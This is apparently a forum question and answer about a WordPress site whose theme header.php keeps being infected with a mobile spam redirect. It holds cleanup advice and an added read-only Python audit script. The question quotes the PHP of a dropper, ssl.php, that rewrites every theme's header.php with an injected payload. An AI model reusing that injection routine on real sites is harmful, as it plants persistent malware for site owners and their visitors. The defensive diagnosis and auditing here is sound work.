How to stop repeated hack on header.php of custom theme?

Noticed some unwanted files in the website root folder and removed them. I have found that the header.php file has some malicious code which redirects to spam sites only on mobile browsers.

When these files exist, .htaccess pretty permalinks do not work.

I have changed the cPanel and FTP passwords. Deleted the unwanted files listed below. Scanned all the files and folders.

After a clean installation of WordPress and plugins, these files are added repeatedly.

Server: shared hosting / Linux server. File transfers using cPanel / FileZilla.

How to stop these repeated attacks?

The list of malicious scripts.

ssl.php has the following code:

if (file_exists("wp-content"))
{
if (file_exists("wp-content/themes"))
{
    $dirs = scandir("wp-content/themes");
    foreach ($dirs as $dir)
    {
        if ((is_dir("wp-content/themes/$dir")) AND ($dir !== ".") AND ($dir !== "..")) 
        {
            if (file_exists("wp-content/themes/$dir/header.php")) 
            {
                          $file = fopen("wp-content/themes/".$dir."/header.php", "r");  
                          $buffer = fread($file, filesize("wp-content/themes/".$dir."/header.php")); 
                          fclose($file);    
               if (eregi('ba9hus.in', $buffer)==0) 
               { 

                            $in = fopen("wp-content/themes/".$dir."/header.php", "w");
                             fwrite($in, $code);
                             fwrite($in, $buffer);
                             fclose($in);
                /*       
                   $in = fopen("wp-content/themes/$dir/header.php", "a");
                   fwrite($in, $code);
                   fclose($in);
                   */
               }
            }
        }
    }
}
}

ssl.php
wp-ssl.php
wp-ssl.zip
news_parser.class.php



Check permissions on all WP folders. Check the htaccess file. Delete any unknown files throughout your hosting area. (Carefully.) Change all of your hosting passwords (including FTP accounts; delete any you don't know). Strong passwords!

Reinstall WP (from your admin - Dashboard, Updates). Reinstall all themes (deactivate, uninstall, reinstall, reactivate). Same for plugins (although header.php is probably in your theme files).

Lots of advice on the googles about recovering a hacked WP install (filter your search by 'last year').

You could also do a brand-new WP install in a separate folder on your hosting account. More work involved here, as you'll need to adjust domain settings, copy data (Tools, Export, then Tools, Import), and re-do all theme and plugin settings.

Be wary of any plugins/themes that you recently installed. Make sure everything is current (WP, themes, plugins). Also check your local computer for weirdness (like updating local OS and apps).

Change passwords everywhere (hosting account, WP, databases, FTP, email) on hosting account. And locally on your computer.

Good luck.

Personal opinion follows

(BTW, I stopped using FileZilla a couple of years ago when I found out they stored credentials - user/pass - in a plain text file easily accessible on your local PC. Haven't used them since, don't know if they fixed it; back then they didn't see that as a vuln. Use WinSCP now. Your mileage may vary.)
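
An added example, not part of the original question or answer: a read-only Python audit of a WordPress root that reports non-core PHP/ZIP files in the web root, theme header.php files containing the ba9hus.in marker that ssl.php tests for, and world-writable paths. The function name audit and the allow-list are this example's own; the list is the set of root-level PHP files in a stock WordPress install.

```python
import os
import stat

# Root-level PHP files shipped by a stock WordPress install (allow-list).
CORE_ROOT_PHP = {
    "index.php", "wp-activate.php", "wp-blog-header.php", "wp-comments-post.php",
    "wp-config.php", "wp-config-sample.php", "wp-cron.php", "wp-links-opml.php",
    "wp-load.php", "wp-login.php", "wp-mail.php", "wp-settings.php",
    "wp-signup.php", "wp-trackback.php", "xmlrpc.php",
}
# Marker the dropper in the question looks for before rewriting header.php.
MARKER = b"ba9hus.in"


def audit(wp_root):
    """Return (unexpected_root_files, infected_headers, world_writable) lists."""
    unexpected, infected, writable = [], [], []
    # 1. PHP or ZIP files in the web root that WordPress core does not ship.
    for name in sorted(os.listdir(wp_root)):
        path = os.path.join(wp_root, name)
        is_script = name.lower().endswith((".php", ".zip"))
        if os.path.isfile(path) and is_script and name not in CORE_ROOT_PHP:
            unexpected.append(name)
    # 2. header.php of every theme, matched case-insensitively like eregi().
    themes = os.path.join(wp_root, "wp-content", "themes")
    if os.path.isdir(themes):
        for theme in sorted(os.listdir(themes)):
            header = os.path.join(themes, theme, "header.php")
            if os.path.isfile(header):
                with open(header, "rb") as fh:
                    if MARKER in fh.read().lower():
                        infected.append(os.path.relpath(header, wp_root))
    # 3. Anything other local users on a shared host could overwrite.
    for dirpath, dirnames, filenames in os.walk(wp_root):
        for entry in dirnames + filenames:
            full = os.path.join(dirpath, entry)
            if os.lstat(full).st_mode & stat.S_IWOTH and not os.path.islink(full):
                writable.append(os.path.relpath(full, wp_root))
    return unexpected, infected, sorted(writable)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    labels = ("unexpected in root", "marker in header.php", "world-writable")
    for label, items in zip(labels, audit(root)):
        for item in items:
            print(f"{label}: {item}")
```

An empty report only means these filenames, this marker and these permission bits are absent; files that reappear after cleanup point to an entry path that is still open.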
